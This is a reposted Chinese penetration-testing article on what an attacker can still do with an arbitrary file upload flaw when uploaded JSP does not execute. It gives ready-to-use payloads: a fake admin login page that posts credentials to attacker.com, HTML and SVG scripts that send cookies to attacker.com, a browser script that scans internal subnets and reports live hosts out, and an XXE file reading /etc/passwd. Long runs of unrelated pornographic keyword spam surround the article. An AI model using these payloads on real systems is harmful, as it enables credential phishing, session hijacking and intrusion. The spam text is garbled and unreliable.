精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

任意文件上傳但 JSP 失效?別急,文件上傳還有這些隱藏玩法!

開發(fā) 應(yīng)用安全
目標(biāo)系統(tǒng)存在任意文件上傳漏洞,攻擊者可以上傳任意類型的文件,但仍會有一些問題,那么,此時我們還能做什么呢?以下是完整的實戰(zhàn)指南。

一、漏洞背景

目標(biāo)系統(tǒng)存在任意文件上傳漏洞,攻擊者可以上傳任意類型的文件,包括 .jsp、.html、.js 等。但:

  • .jsp 雖可上傳,但 無法執(zhí)行(可能情況:Web 服務(wù)器不解析 JSP、權(quán)限限制、文件路徑未知等)。
  • 文件真實路徑已知,上傳后文件訪問不解析執(zhí)行。
  • 不能依賴傳統(tǒng)的 WebShell 方式上線或執(zhí)行命令。

那么,此時我們還能做什么呢?以下是完整的實戰(zhàn)指南。

二、核心目標(biāo)

即使無法執(zhí)行服務(wù)器端腳本,任意文件上傳仍具備以下潛力:

  • 信息擴(kuò)大與目標(biāo)偵察
  • 誘導(dǎo)型攻擊(釣魚/社工)
  • 輔助其他漏洞鏈構(gòu)建(如 XSS、LFI、XXE 等)

三、利用方式與可行性分析

1. 上傳 HTML + JS 頁面誘導(dǎo)訪問(釣魚攻擊)

思路: 上傳惡意 HTML 頁面,誘導(dǎo)管理員點(diǎn)擊訪問,執(zhí)行 JS 代碼,實現(xiàn) XSS、信息收集或內(nèi)網(wǎng)探測。

示例:上傳誘導(dǎo)頁面 login.html

<!-- fake_admin_login.html -->
<html>
<body>
<h2>后臺登錄已超時,請重新登錄</h2>
<form action="http://attacker.com/collect" method="POST">
      用戶名:<input name="user"><br>
      密碼:<input type="password" name="pass"><br>
<input type="submit" value="登錄">
</form>
</body>
</html>

利用方式:

  • 上傳該文件,設(shè)為 login.html
  • 發(fā)送釣魚鏈接到管理員或目標(biāo)用戶(如:https://target.com/uploads/login.html)
  • 等待憑據(jù)提交到攻擊者服務(wù)器

2. 注入型 HTML/JS 頁面 -> XSS 腳本執(zhí)行

思路: 上傳帶有 XSS Payload 的 .html, .svg, .js 文件,誘導(dǎo)訪問即觸發(fā)腳本。

示例:xss.html

<html>
<body>
<script>
      fetch("http://attacker.com/collect?cookie=" + document.cookie);
</script>
<h1>加載中...</h1>
</body>
</html>

利用方式:

  • 上傳 xss.html
  • 訪問鏈接誘導(dǎo)管理員點(diǎn)擊(或目標(biāo)系統(tǒng)自動加載 HTML 頁面如日志、圖像、文檔)
  • 自動發(fā)送管理員 Cookie 給攻擊者,實現(xiàn)后臺會話劫持

3. SVG 文件 XSS 利用(繞過限制)

思路: SVG 是合法圖像格式,支持嵌入腳本,可繞過部分上傳限制系統(tǒng)。

示例:xss.svg

<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://attacker.com/log?c='+document.cookie)">
<circle cx="100" cy="100" r="50" fill="blue"/>
</svg>

利用方式:

  • 上傳 xss.svg
  • 如果有“文件預(yù)覽”、“圖像查看”功能,管理員點(diǎn)擊查看時即被觸發(fā)

4. 利用上傳文件進(jìn)行內(nèi)網(wǎng)信息收集(誘導(dǎo)掃描)

思路: 上傳 JS 頁面誘導(dǎo)用戶瀏覽器請求內(nèi)網(wǎng)地址,攻擊者據(jù)此確認(rèn)內(nèi)網(wǎng)結(jié)構(gòu)。

示例:intranet_scan.html

<script>
const ports = [80, 8080, 5000, 8000];
const subnet = "192.168.1.";
for (let i = 1; i <= 254; i++) {
  ports.forEach(port => {
let target = `http://${subnet}${i}:${port}`;
    fetch(target, { mode: 'no-cors' }).then(() => {
      fetch("http://attacker.com/log?host=" + encodeURIComponent(target)); // 結(jié)果返回
    });
  });
}
</script>

利用方式:

  • 誘導(dǎo)管理員或內(nèi)部用戶訪問上傳頁面
  • 瀏覽器觸發(fā)內(nèi)網(wǎng)請求
  • 攻擊者服務(wù)器接收成功請求,獲得內(nèi)網(wǎng) IP 存活資產(chǎn)

5. 惡意 XML / JSON 文件觸發(fā) XXE / 配置注入

思路: 某些系統(tǒng)會解析上傳的 XML/JSON 文件,若未安全配置,可能觸發(fā) XXE 或 JSON 配置注入。

示例:evil.xml

<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM"file:///etc/passwd">
]>
<root>&xxe;</root>

利用方式:

  • 上傳該 XML 文件(如配置文件、報告模板等)
  • 等待系統(tǒng)解析并反饋結(jié)果
  • 若 XXE 存在,攻擊者能獲取服務(wù)器本地文件內(nèi)容

6. 文件覆蓋 / 配置污染(需路徑可控)

思路: 若上傳路徑可控或服務(wù)端目錄結(jié)構(gòu)可探測,嘗試覆蓋配置文件、JS 文件、日志文件等。

比如:

  • 覆蓋 .js 文件供前端加載
  • 覆蓋 Nginx 配置或 Spring YAML 配置(若應(yīng)用會加載上傳的配置)

四、如何獲取文件真實路徑

1. 響應(yīng)內(nèi)容回顯分析

大多數(shù)文件上傳接口在上傳成功后會返回響應(yīng)信息,其中可能包含如下內(nèi)容:

  • 文件的訪問路徑(絕對或相對){"url":"/upload/imgs/abc.jpg"}
  • 存儲路徑或文件名{"filePath":"C:\\web\\uploads\\abc.jsp"}
  • 上傳后的文件名(可用于拼接路徑){"file":"abc.jsp"}

建議:詳細(xì)分析響應(yīng)體中的 JSON、HTML、Headers,尤其是如 url、path、location 字段。

2. 功能頁面自動引用上傳文件

有些上傳功能會直接在前端頁面或后端邏輯中使用上傳的文件,例如:

  • 上傳頭像后,在用戶詳情頁自動加載該圖片
  • 上傳合同后,在某個預(yù)覽地址中通過真實路徑訪問文件
  • 富文本上傳圖片后,在文章編輯區(qū)預(yù)覽

建議:

  • 上傳文件后觀察是否有圖片、音頻、PDF 等自動加載;
  • 監(jiān)聽是否有新請求發(fā)起,URL 中可能就含有真實路徑;
  • 若返回 img src、iframe、object 標(biāo)簽,路徑常嵌入其中。

3. 路徑猜解與探測(信息有限時)

若以上兩種方式都失敗,就只能根據(jù)已有線索猜測路徑或進(jìn)行探測。例如:

(1) 根據(jù)上傳接口的路徑推斷訪問路徑:

  • 上傳接口為 /api/upload/image
  • 通常可猜測訪問路徑可能為 /static/upload/image/xxx.png

(2) 常見路徑規(guī)則嘗試:

  • /uploads/
  • /userfiles/
  • /static/
  • /assets/upload/
  • /files/

(3) 使用目錄掃描工具(如 dirsearch)配合上傳文件名進(jìn)行路徑爆破。

(4) 結(jié)合響應(yīng)文件名構(gòu)造路徑:

  • /upload/abc.jpg
  • /uploads/images/abc.jpg
  • 返回了文件名 abc.jpg,你可以嘗試:

注意:猜測路徑時盡量使用時間戳、UUID、用戶ID等組合邏輯,還可結(jié)合源碼、JS、路徑泄漏等輔助信息。

五、總結(jié)

  • 不要一開始就死磕 .jsp 的執(zhí)行
  • 盡量從業(yè)務(wù)功能角度多思考上傳的文件,如何被使用、包含或處理
  • 善用 HTML + JS 組合的誘導(dǎo)和信息獲取能力
  • 一旦能訪問上傳文件,釣魚 + XSS 是最快獲取權(quán)限的方式之一

利用方式

文件類型

目標(biāo)效果

難度

附加條件

HTML 釣魚/社工

.html

獲取憑據(jù),誘導(dǎo)訪問

?

用戶配合/誘導(dǎo)

JS 掃描腳本

.js

/.html

內(nèi)網(wǎng)探測/信息泄露

??

管理員需訪問

XSS 攻擊

.html

/.svg

打 Cookie,后臺劫持會話

???

瀏覽器解析+誘導(dǎo)點(diǎn)擊

XXE 注入

.xml

讀取服務(wù)器文件

???

服務(wù)端解析器需存在 XXE 漏洞

SVG 繞過上傳限制

.svg

圖像預(yù)覽時觸發(fā)

??

圖像可預(yù)覽/自動渲染

配置覆蓋攻擊

任意

覆蓋 JS/config,污染執(zhí)行點(diǎn)

????

上傳路徑可控

責(zé)任編輯:趙寧寧 來源: 季升安全
相關(guān)推薦

2013-10-31 13:19:06

2009-07-02 13:31:13

JSP組件

2009-07-06 17:11:38

Servlet文件上傳

2009-06-25 15:50:03

Struts2教程上傳任意多個文件

2022-08-11 08:25:58

5G6G運(yùn)營商

2011-12-26 10:17:12

2009-02-04 14:00:59

2025-04-30 08:39:33

SpringMVC接口

2019-03-12 11:06:47

iOS 12AppleiPhone

2009-07-03 17:15:31

jsp上傳文件

2016-12-15 08:28:34

HttpURLConn上傳文件

2022-05-29 08:54:44

Edge瀏覽器

2018-09-13 10:59:30

Redis鍵值存儲

2009-07-06 17:34:20

PEARMail函數(shù)php

2009-08-13 15:18:23

C#文件上傳

2011-12-30 09:49:36

Silverlight

2009-07-14 17:20:31

Webwork文件上傳

2015-04-14 09:46:09

Apple Watch秘密

2025-04-14 10:35:00

for 循環(huán)

2023-11-27 13:19:00

數(shù)據(jù)AI
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號

99久久夜色精品国产亚洲96| 中国av在线播放| 久久国产主播| 色悠悠久久88| 性一交一黄一片| 深夜在线视频| 亚洲欧美综合在线精品| 国产伦精品一区二区三毛| 亚洲欧美日韩激情| 91精品国产乱码久久久久久久| 精品国产乱码久久久久久牛牛 | 456国产精品| 天堂av网手机版| 大桥未久女教师av一区二区| 日本丰满少妇一区二区三区| 91精品国产毛片武则天| 日韩美女一级视频| 国产呦萝稀缺另类资源| 欧美亚洲国产成人精品| 成人在线观看免费完整| 精品高清久久| 欧美精品一区二区三区一线天视频| 亚洲精品高清无码视频| tube8在线hd| 中文字幕一区二区三中文字幕| 久久国产精品久久| 国产富婆一级全黄大片| 青草av.久久免费一区| 久久人人爽人人爽人人片av高请| 亚洲精品天堂网| 蜜臀av免费一区二区三区 | 亚洲国产欧美另类| 秋霞成人午夜伦在线观看| 久久久这里只有精品视频| 波多野结衣喷潮| 精品精品久久| 亚洲欧美精品伊人久久| 在线观看免费视频国产| 精品国模一区二区三区欧美| 在线看不卡av| 日韩av片在线看| f2c人成在线观看免费视频| 亚洲欧美日韩久久| 亚洲无玛一区| av成人手机在线| 国产三级久久久| 欧美精品一区二区三区在线四季 | 九九免费精品视频| 欧美xxav| 日韩在线观看网址| 中国1级黄色片| 激情五月综合网| 精品无人区乱码1区2区3区在线| 日本美女视频网站| 一区二区视频| 日韩免费在线观看| japan高清日本乱xxxxx| 久久一级大片| 日韩欧美一二区| 免费观看一区二区三区| 成人午夜网址| 亚洲成人久久网| 欧美成人三级伦在线观看| 国产精品视屏| 日韩精品极品毛片系列视频| 欧美色图亚洲激情| 欧美激情在线精品一区二区三区| 亚洲欧洲国产一区| av永久免费观看| 日韩欧美一区二区三区在线视频| 日韩资源在线观看| 手机在线免费看毛片| 亚洲字幕久久| 欧美激情伊人电影| 国产综合精品视频| 日韩制服丝袜av| 91精品久久久久久久久久久久久久 | 风流老熟女一区二区三区| 成人美女在线观看| 久久国产手机看片| 粉嫩av在线播放| 亚洲女女做受ⅹxx高潮| 国产一区二区三区小说| 欧美xo影院| 欧美日韩国产欧美日美国产精品| 国产探花在线观看视频| 国产乱人伦精品一区| 亚洲欧美激情一区| 亚洲精品国产精品乱码在线观看| 欧美午夜一区二区福利视频| 欧美一级bbbbb性bbbb喷潮片| 懂色av中文字幕| 国产一区二区精品在线观看| 精品高清视频| 91免费在线| 亚洲午夜一区二区| 久久黄色免费看| 欧美成人精品午夜一区二区| 国产视频久久久| 日韩精品一区二区三区在线视频| 亚洲国产高清一区| 国产精品视频1区| 91亚洲精品国偷拍自产在线观看| 成人激情文学综合网| 亚洲精品一区二区三区蜜桃久 | 国产精品久久久久久妇女6080| 最新av网址在线观看| 亚洲人体视频| 日韩一区二区在线观看视频播放| 37p粉嫩大胆色噜噜噜| 99成人在线视频| 欧美一二三视频| 亚洲av永久纯肉无码精品动漫| 久久久精品国产免大香伊| 日韩欧美一级在线| 欧美成人毛片| 精品呦交小u女在线| 在线看的片片片免费| 丝袜亚洲精品中文字幕一区| 国产精品久久久一区二区三区| 中文字幕在线免费| 欧美日韩一区二区在线 | 国产成人午夜精品5599| 视频在线精品一区| 成人福利视频| 亚洲国产欧美一区| 欧美黄色免费观看| 久久成人久久鬼色| 日本一区二区三区视频在线观看| 波多野结衣视频一区二区| 欧美一区午夜视频在线观看| 香蕉久久久久久久| 老**午夜毛片一区二区三区| 精品蜜桃一区二区三区| 波兰性xxxxx极品hd| 性做久久久久久久久久| 国产精品自拍一区| 亚洲欧洲日韩综合二区| 成人va天堂| 亚洲欧美制服另类日韩| 国产无套粉嫩白浆内谢| 国产成人在线视频网址| 久久免费视频2| 欧美大陆国产| 国产亚洲精品久久| 天天爱天天做天天爽| 2欧美一区二区三区在线观看视频| 国产免费一区二区视频| 日韩精品视频中文字幕| 美日韩在线视频| 国产又粗又猛又黄| 成人欧美一区二区三区白人| 日韩av在线中文| 色婷婷热久久| 成人av在线网址| 黄色一级片在线观看| 欧美日韩免费不卡视频一区二区三区| 一二三四国产精品| 奇米色一区二区| 夜夜爽www精品| 粉嫩av国产一区二区三区| 久久国产精品久久精品| 亚洲黄色小说网| 亚洲国产欧美在线| 五级黄高潮片90分钟视频| 久久天堂成人| 国产精品自拍三区| 久久久久久夜| 国产女主播视频一区二区| 穿情趣内衣被c到高潮视频| 欧美一级片免费在线观看| 免费高清成人在线| 99精品视频网站| 日韩欧美中文字幕一区二区三区| 久久国产精品网站| 91亚洲国产成人久久精品麻豆| 成人线上播放| 久久成人18免费网站| 亚洲爱情岛论坛永久| 亚洲高清不卡在线| 国产成人无码一区二区在线观看| 久久国产免费| 日本黄色a视频| 国产美女撒尿一区二区| 日本一区二区三区四区视频| 在线观看的av| 日韩女优电影在线观看| 在线观看国产亚洲| 国产精品女主播在线观看| 最好看的中文字幕| 六月丁香综合| 国产911在线观看| 日韩精品福利一区二区三区| 国产精品亚洲аv天堂网| 日本色护士高潮视频在线观看| 亚洲国模精品私拍| 亚洲一级片免费看| 偷拍日韩校园综合在线| 国产熟女一区二区| 国产91富婆露脸刺激对白| 成人一级片网站| 久久久久久久久久久9不雅视频| 国产尤物99| 亚洲日日夜夜| 1769国产精品| 伊人电影在线观看| 一区二区亚洲精品国产| 国模无码一区二区三区| 欧美亚洲自拍偷拍| 日本一二三区不卡| 成人欧美一区二区三区视频网页 | 国产免费拔擦拔擦8x在线播放 | 欧美日韩一区不卡| 日本在线免费观看| 中文字幕日韩欧美一区二区三区| 中文字幕一区二区人妻电影丶| 麻豆专区一区二区三区四区五区| 欧美黑人经典片免费观看| 天天射天天综合网| 日韩av电影免费观看| 久久99偷拍| 91天堂在线视频| 欧美三级精品| 久久久影视精品| www免费在线观看| 一本大道亚洲视频| 午夜国产在线观看| 精品久久久网站| 国产又粗又猛又黄| 欧美色综合影院| 五月天激情四射| 亚洲第一激情av| 妺妺窝人体色www婷婷| 国产精品美女久久久久久久| 成人性生交大免费看| 国产999精品久久| 精品人妻一区二区三区免费| 美女诱惑一区二区| 超碰av在线免费观看| 久久国产欧美| 成人在线观看黄| 国产一区二区三区久久| 黄色片网址在线观看| 精品av久久久久电影| 少妇大叫太大太粗太爽了a片小说| 欧洲福利电影| 亚洲ai欧洲av| 红桃成人av在线播放| 日本午夜精品一区二区| 亚洲v天堂v手机在线| 美女亚洲精品| 亚洲婷婷丁香| 日韩久久不卡| 超碰成人久久| 亚洲午夜精品一区二区三区| 久久精品高清| 伊人久久大香线蕉av一区| 日韩电影在线视频| 亚洲精品9999| 午夜精品毛片| 国产911在线观看| 在线观看一区视频| 日本在线xxx| 久久精品一本| 亚洲欧洲日本精品| 激情都市一区二区| 无人码人妻一区二区三区免费| 国产美女视频一区| 日本不卡视频一区| 9l国产精品久久久久麻豆| 90岁老太婆乱淫| 国产精品美女久久久久久| 午夜爽爽爽男女免费观看| 一区二区三区四区在线播放| 日本熟妇色xxxxx日本免费看| 精品久久久久久中文字幕| 欧美日韩a v| 91精品国产色综合久久久蜜香臀| 亚洲精品无码专区| 亚洲精品中文字幕女同| h视频网站在线观看| 久久成人在线视频| 黄色影院在线看| 欧美中文在线观看| 日本亚洲欧洲无免费码在线| 97碰碰视频| 免费黄色成人| 欧洲xxxxx| 美女久久网站| 亚洲女人在线观看| 久久一区二区三区国产精品| 三上悠亚在线观看视频| 亚洲免费大片在线观看| 68精品久久久久久欧美| 天天爽夜夜爽视频| 日韩电影在线看| 久久人人爽人人片| 99久久免费视频.com| 西西444www无码大胆| 国产剧情在线观看| 欧洲亚洲国产日韩| 国产白浆在线观看| 亚洲精品天天看| 男人的天堂在线视频免费观看 | 精品免费视频| 日本男女交配视频| 石原莉奈一区二区三区在线观看| jizz18女人| 99视频热这里只有精品免费| 美国一级黄色录像| 午夜视频一区在线观看| 在线观看色网站| 日韩精品一区二区三区四区视频| 欧美日韩免费做爰大片| 欧美激情18p| 欧美特黄色片| 欧美日韩精品免费在线观看视频| 欧美激情综合色综合啪啪| 色哟哟精品视频| 91一区二区三区在线播放| 日本福利片在线观看| 欧美亚洲国产一卡| 日韩a在线观看| 欧美激情视频网| 亚洲精品成人一区| 日韩久久久久久久| 亚洲一区二区动漫| 中文字幕在线观看91| 国产精品二区一区二区aⅴ污介绍| 久久久久久在线观看| 日韩av网站导航| 男女羞羞视频在线观看| 91九色视频在线观看| 99久久夜色精品国产亚洲96| 校园春色 亚洲色图| 久久久久国产精品厨房| 久久久久久少妇| 日韩精品免费电影| 乡村艳史在线观看| 国产偷国产偷亚洲高清97cao| 欧美福利视频| 91插插插影院| √…a在线天堂一区| 一级久久久久久久| 在线观看成人黄色| 色8久久影院午夜场| 日韩欧美三级电影| 天堂久久久久va久久久久| 黄色网址在线视频| 天天综合天天做天天综合| 亚洲免费成人网| 久久久久久av| 欧美人妖在线观看| 日本三级免费观看| 久久精品视频一区二区| 懂色av中文字幕| 少妇高潮久久77777| 99视频有精品高清视频| 手机在线视频你懂的| 韩国av一区二区| 深夜福利影院在线观看| 欧美tickling网站挠脚心| a√中文在线观看| 久久精品国产综合精品| 新67194成人永久网站| 黑人巨大精品欧美| 欧美亚洲高清一区| 免费a在线看| 亚洲永久在线观看| 激情视频一区| 免费在线观看成年人视频| 欧美性xxxx在线播放| a天堂中文在线88| 国产中文字幕日韩| 好看不卡的中文字幕| 在线观看国产免费视频| 欧美伊人精品成人久久综合97| 久久综合网导航| 国产伦理一区二区三区| 久久久久国产精品一区二区| 日韩国产激情在线| 国产日韩一级片| 久久久午夜视频| 成人激情在线| 韩国三级丰满少妇高潮| 精品国产91久久久久久老师| 大乳在线免费观看| 444亚洲人体| 久久在线精品| wwwav国产| 亚洲欧洲日本专区| 精品麻豆剧传媒av国产九九九| 玩弄中年熟妇正在播放| 国产精品视频麻豆| 日本韩国免费观看| 成人av电影天堂| 亚洲永久视频| 欧美 日韩 国产 一区二区三区 | 国产综合在线观看| 不卡一区二区三区视频|